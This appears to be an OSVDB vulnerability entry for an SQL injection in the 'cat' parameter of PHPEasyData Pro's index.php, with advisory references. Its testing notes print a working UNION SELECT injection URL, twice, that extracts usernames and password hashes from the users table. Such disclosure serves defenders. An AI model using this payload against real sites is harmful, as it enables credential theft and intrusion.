PHPEasyData Pro index.php cat Variable SQL Injection

2006-10-29T12:48:47
ID OSVDB:30130
Type osvdb
Reporter OSVDB
Modified 2006-10-29T12:48:47

Description

Manual Testing Notes

/index.php?cat=-1//union//select//0,concat(user_login,char(32),user_pass),0,0//from//an_users//where/*/user_id%20like%205/

/index.php?cat=-1//union//select//0,concat(user_login,char(32),user_pass),0,0//from//an_users//where/*/user_id%20like%205/

References:

Security Tracker: 1017137 Secunia Advisory ID:22616 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0485.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0484.html ISS X-Force ID: 29866 Generic Exploit URL: http://milw0rm.com/exploits/2675 FrSIRT Advisory: ADV-2006-4263 CVE-2006-5707